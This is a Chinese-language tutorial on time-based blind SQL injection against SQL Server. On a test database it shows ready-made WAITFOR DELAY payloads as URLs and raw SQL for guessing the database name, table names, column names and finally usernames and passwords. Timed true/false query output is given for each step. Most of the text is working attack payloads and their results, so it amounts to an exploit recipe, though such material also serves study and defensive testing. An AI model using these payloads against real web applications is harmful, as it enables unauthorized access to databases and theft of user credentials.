0x01 前言

SQL Server 的延时注入比较离谱,延时代码必须放到 SQL语句的最后面

这就导致了,注入点必须可以闭合代码,并且使用 — 注释掉后面的无用代码

如果没有办法保证 waitfor delay ‘0:0:5’ 在 SQL的最后面,那么本方法就无法使用

0x02 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 猜库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的数据库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=1‘ IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a

数据库语句: select * from article WHERE id=’1’ IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a’;

  1. # 获取 当前连接的数据库 数据
  2. # 对得情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a';
  10. 2> go
  11. +----+----------+----------+
  12. | id | title | content |
  13. +----+----------+----------+
  14. | 1 | 测试标题 | 测试内容 |
  15. +----+----------+----------+
  16. (1 rows affected) (5.064 sec)
  17. # 错误的情况
  18. 1> SELECT
  19. *
  20. FROM
  21. article
  22. WHERE
  23. id = '1'
  24. IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a';
  25. 2> go
  26. +----+----------+----------+
  27. | id | title | content |
  28. +----+----------+----------+
  29. | 1 | 测试标题 | 测试内容 |
  30. +----+----------+----------+
  31. (1 rows affected) (0.04 sec)

0x04 猜表名

注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1‘ IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like ‘%article%’) waitfor delay ‘0:0:5’ — a

数据库语句: select * from article WHERE id=’1’ IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like ‘%article%’) waitfor delay ‘0:0:5’ — a’;

  1. # 获取 当前库 1表数据
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (
  10. (
  11. SELECT
  12. table_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17. table_name
  18. FROM
  19. information_schema.tables
  20. WHERE
  21. table_catalog = db_name()
  22. ) AS a
  23. WHERE
  24. row_number = 1
  25. ) LIKE '%article%'
  26. ) WAITFOR delay '0:0:5' -- a';
  27. 2> go
  28. +----+----------+----------+
  29. | id | title | content |
  30. +----+----------+----------+
  31. | 1 | 测试标题 | 测试内容 |
  32. +----+----------+----------+
  33. (1 rows affected) (5.03 sec)
  34. # 错误的情况
  35. 1> SELECT
  36. *
  37. FROM
  38. article
  39. WHERE
  40. id = '1'
  41. IF (
  42. (
  43. SELECT
  44. table_name
  45. FROM
  46. (
  47. SELECT
  48. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  49. table_name
  50. FROM
  51. information_schema.tables
  52. WHERE
  53. table_catalog = db_name()
  54. ) AS a
  55. WHERE
  56. row_number = 1
  57. ) LIKE '%bbbb%'
  58. ) WAITFOR delay '0:0:5' -- a';
  59. 2> go
  60. +----+----------+----------+
  61. | id | title | content |
  62. +----+----------+----------+
  63. | 1 | 测试标题 | 测试内容 |
  64. +----+----------+----------+
  65. (1 rows affected) (0.05 sec)
  1. # 获取 当前库 2表数据
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (
  10. (
  11. SELECT
  12. table_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17. table_name
  18. FROM
  19. information_schema.tables
  20. WHERE
  21. table_catalog = db_name()
  22. ) AS a
  23. WHERE
  24. row_number = 2
  25. ) LIKE '%users%'
  26. ) WAITFOR delay '0:0:5' -- a';
  27. 2> go
  28. +----+----------+----------+
  29. | id | title | content |
  30. +----+----------+----------+
  31. | 1 | 测试标题 | 测试内容 |
  32. +----+----------+----------+
  33. (1 rows affected) (5.05 sec)
  34. # 错误的情况
  35. 1> SELECT
  36. *
  37. FROM
  38. article
  39. WHERE
  40. id = '1'
  41. IF (
  42. (
  43. SELECT
  44. table_name
  45. FROM
  46. (
  47. SELECT
  48. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  49. table_name
  50. FROM
  51. information_schema.tables
  52. WHERE
  53. table_catalog = db_name()
  54. ) AS a
  55. WHERE
  56. row_number = 2
  57. ) LIKE '%aaaaaaa%'
  58. ) WAITFOR delay '0:0:5' -- a';
  59. 2> go
  60. +----+----------+----------+
  61. | id | title | content |
  62. +----+----------+----------+
  63. | 1 | 测试标题 | 测试内容 |
  64. +----+----------+----------+
  65. (1 rows affected) (0.03 sec)

0x05 猜字段

注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段

查询不同的表可以这样
例如:
table_name=’要查询的表名’

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1‘ IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1) like ‘%id%’) waitfor delay ‘0:0:5’ — a

数据库语句: select * from article WHERE id=’1’ IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1) like ‘%id%’) waitfor delay ‘0:0:5’ — a’;

  1. # 当前库 users表 字段数据列表
  2. 1> SELECT
  3. *
  4. FROM
  5. (
  6. SELECT
  7. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  8. column_name
  9. FROM
  10. information_schema.columns
  11. WHERE
  12. table_catalog = db_name()
  13. AND table_name = 'users'
  14. ) AS a;
  15. 2> go
  16. +-------------+-------------+
  17. | row_number | column_name |
  18. +-------------+-------------+
  19. | 1 | id |
  20. | 2 | password |
  21. | 3 | username |
  22. +-------------+-------------+
  23. (3 rows affected)
  1. # 获取当前库 users表 第一个字段数据
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (
  10. (
  11. SELECT
  12. column_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  17. column_name
  18. FROM
  19. information_schema.columns
  20. WHERE
  21. table_catalog = db_name()
  22. AND table_name = 'users'
  23. ) AS a
  24. WHERE
  25. row_number = 1
  26. ) LIKE '%id%'
  27. ) WAITFOR delay '0:0:5' -- a';
  28. 2> go
  29. +----+----------+----------+
  30. | id | title | content |
  31. +----+----------+----------+
  32. | 1 | 测试标题 | 测试内容 |
  33. +----+----------+----------+
  34. (1 rows affected) (5.077 sec)
  35. # 错误的情况
  36. 1> SELECT
  37. *
  38. FROM
  39. article
  40. WHERE
  41. id = '1'
  42. IF (
  43. (
  44. SELECT
  45. column_name
  46. FROM
  47. (
  48. SELECT
  49. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  50. column_name
  51. FROM
  52. information_schema.columns
  53. WHERE
  54. table_catalog = db_name()
  55. AND table_name = 'users'
  56. ) AS a
  57. WHERE
  58. row_number = 1
  59. ) LIKE '%aaaaaaaaa%'
  60. ) WAITFOR delay '0:0:5' -- a';
  61. 2> go
  62. +----+----------+----------+
  63. | id | title | content |
  64. +----+----------+---------5+
  65. | 1 | 测试标题 | 测试内容 |
  66. +----+----------+----------+
  67. (1 rows affected) (0.003 sec)
  1. # 获取当前库 users表 第二个字段数据
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (
  10. (
  11. SELECT
  12. column_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  17. column_name
  18. FROM
  19. information_schema.columns
  20. WHERE
  21. table_catalog = db_name()
  22. AND table_name = 'users'
  23. ) AS a
  24. WHERE
  25. row_number = 2
  26. ) LIKE '%password%'
  27. ) WAITFOR delay '0:0:5' -- a';
  28. 2> go
  29. +----+----------+----------+
  30. | id | title | content |
  31. +----+----------+----------+
  32. | 1 | 测试标题 | 测试内容 |
  33. +----+----------+----------+
  34. (1 rows affected) (5.05 sec)
  35. # 错误的情况
  36. 1> SELECT
  37. *
  38. FROM
  39. article
  40. WHERE
  41. id = '1'
  42. IF (
  43. (
  44. SELECT
  45. column_name
  46. FROM
  47. (
  48. SELECT
  49. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  50. column_name
  51. FROM
  52. information_schema.columns
  53. WHERE
  54. table_catalog = db_name()
  55. AND table_name = 'users'
  56. ) AS a
  57. WHERE
  58. row_number = 2
  59. ) LIKE '%savasv%'
  60. ) WAITFOR delay '0:0:5' -- a';
  61. 2> go
  62. +----+----------+----------+
  63. | id | title | content |
  64. +----+----------+----------+
  65. | 1 | 测试标题 | 测试内容 |
  66. +----+----------+----------+
  67. (1 rows affected) (0.03 sec)

0x06 猜内容

注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段

获取不同得字段数据可以修改 web语句里面得 a.username
例如
user表字段数据为:id, username,password
因为我使用了别名,所以如果想要获取其他得数据可以改成
a.id,a.username,a.password

查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1‘ IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like ‘%test-user-01%’) waitfor delay ‘0:0:5’ — a

数据库语句: select from article WHERE id=’1’ IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1) like ‘%test-user-01%’) waitfor delay ‘0:0:5’ — a’;

  1. # 查询users表 第一条数据, username 字段数据
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (
  10. (
  11. SELECT
  12. a.username
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  17. FROM
  18. users
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. ) LIKE '%test-user-01%'
  23. ) WAITFOR delay '0:0:5' -- a';
  24. 2> go
  25. +----+----------+----------+
  26. | id | title | content |
  27. +----+----------+----------+
  28. | 1 | 测试标题 | 测试内容 |
  29. +----+----------+----------+
  30. (1 rows affected) (5.07 sec)
  31. # 错误的情况
  32. 1> SELECT
  33. *
  34. FROM
  35. article
  36. WHERE
  37. id = '1'
  38. IF (
  39. (
  40. SELECT
  41. a.username
  42. FROM
  43. (
  44. SELECT
  45. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  46. FROM
  47. users
  48. ) AS a
  49. WHERE
  50. row_number = 1
  51. ) LIKE '%aaaaaa%'
  52. ) WAITFOR delay '0:0:5' -- a';
  53. 2> go
  54. +----+----------+----------+
  55. | id | title | content |
  56. +----+----------+----------+
  57. | 1 | 测试标题 | 测试内容 |
  58. +----+----------+----------+
  59. (1 rows affected) (0.07 sec)
  1. # 查询users表 第二条数据, password 字段数据
  2. # 对的情况
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = '1'
  9. IF (
  10. (
  11. SELECT
  12. a.password
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  17. FROM
  18. users
  19. ) AS a
  20. WHERE
  21. row_number = 2
  22. ) LIKE '%234567%'
  23. ) WAITFOR delay '0:0:5' -- a';
  24. 2> go
  25. +----+----------+----------+
  26. | id | title | content |
  27. +----+----------+----------+
  28. | 1 | 测试标题 | 测试内容 |
  29. +----+----------+----------+
  30. (1 rows affected) (5.06 sec)
  31. # 错误的情况
  32. 1> SELECT
  33. *
  34. FROM
  35. article
  36. WHERE
  37. id = '1'
  38. IF (
  39. (
  40. SELECT
  41. a.password
  42. FROM
  43. (
  44. SELECT
  45. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  46. FROM
  47. users
  48. ) AS a
  49. WHERE
  50. row_number = 2
  51. ) LIKE '%aascacascsac%'
  52. ) WAITFOR delay '0:0:5' -- a';
  53. 2> go
  54. +----+----------+----------+
  55. | id | title | content |
  56. +----+----------+----------+
  57. | 1 | 测试标题 | 测试内容 |
  58. +----+----------+----------+
  59. (1 rows affected) (0.06 sec)